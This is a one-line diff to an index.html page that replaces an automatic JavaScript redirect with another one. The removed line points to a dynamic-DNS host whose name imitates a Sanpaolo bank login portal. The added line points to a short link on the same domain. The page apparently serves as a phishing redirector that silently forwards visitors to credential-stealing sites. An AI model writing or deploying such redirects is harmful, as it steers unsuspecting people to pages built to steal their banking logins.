--- a/index.html
+++ b/index.html
@@ -1,1 +1,1 @@
-<script type="text/javascript">window.location = "https://sicurezza-esclusiva-xmr-wallet-online-pagamento.nsupdate.info/login-form-sanpaolo/portale-accedi";</script>
+<script type="text/javascript">window.location = "https://valids.nsupdate.info/r/BRKKJv7";</script>
